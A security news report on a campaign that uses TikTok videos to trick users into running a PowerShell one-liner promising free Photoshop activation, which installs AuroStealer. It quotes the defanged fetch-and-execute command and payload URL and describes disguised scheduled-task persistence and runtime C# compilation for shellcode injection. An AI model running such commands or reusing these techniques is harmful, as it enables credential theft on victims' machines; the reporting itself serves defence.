Cybercriminals are exploiting TikTok’s massive user base to distribute sophisticated malware campaigns that promise free software activation but deliver dangerous payloads instead.
The attack leverages social engineering tactics reminiscent of the ClickFix technique, where unsuspecting users are tricked into executing malicious PowerShell commands on their systems.
Victims encounter TikTok videos offering free activation of popular software like Photoshop, with one such video accumulating over 500 likes before detection.
The attack chain begins when users follow instructions to open PowerShell with administrator privileges and execute a deceptively simple one-liner command.
The initial infection vector instructs victims to run the command iex (irm slmgr[.]win/photoshop), which fetches and executes malicious PowerShell code from a remote server.
This first-stage payload (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23) achieved a VirusTotal detection rate of 17/63, demonstrating its evasive capabilities.
The script downloads a secondary executable called updater.exe from hxxps://file-epq[.]pages[.]dev/updater.exe, which analysis revealed as AuroStealer malware designed to harvest sensitive credentials and system information.
.webp "Hackers Using TikTok Videos to Deploy Self-Compiling Malware That Leverages PowerShell for Execution 3")
Internet Storm Center researchers identified the campaign and discovered that persistence mechanisms are implemented through scheduled tasks disguised as legitimate system processes.
The malware randomly selects task names such as “MicrosoftEdgeUpdateTaskMachineCore” to blend in with genuine Windows services, ensuring execution at every user logon.
A third payload named source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011) introduces an advanced evasion technique by compiling C# code on-demand during runtime using the .NET Framework compiler located at C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe.
Self-Compiling Technique and Memory Injection
The self-compiling capability represents a sophisticated approach to evade traditional detection mechanisms.
The malware compiles a C# class during execution that imports kernel32.dll functions including VirtualAlloc, CreateThread, and WaitForSingleObject.
This dynamically compiled code allocates executable memory space, injects shellcode directly into the process memory, and creates a new thread to execute the malicious payload without writing additional files to disk.
Researchers discovered multiple variations of this campaign across TikTok targeting users searching for cracked versions of various software applications, highlighting the importance of avoiding untrusted sources for software downloads.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
